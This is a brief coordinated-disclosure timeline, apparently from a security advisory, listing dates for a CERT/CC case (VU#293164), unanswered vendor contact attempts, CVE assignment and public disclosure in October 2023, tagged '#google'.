Case opened with CERT Coordination Center (CERT/CC) to assist with responsible disclosure.

Aug 21, 2023

CERT/CC’s time window to responsible disclosure begins (Case VU#293164).

Oct 05, 2023

Two attempts made by CERT/CC in the window receive no response and 45 day window ends.

Oct 05, 2023

CVE number assigned by MITRE.

Oct 07, 2023

Responsible public disclosure.

Tag

#google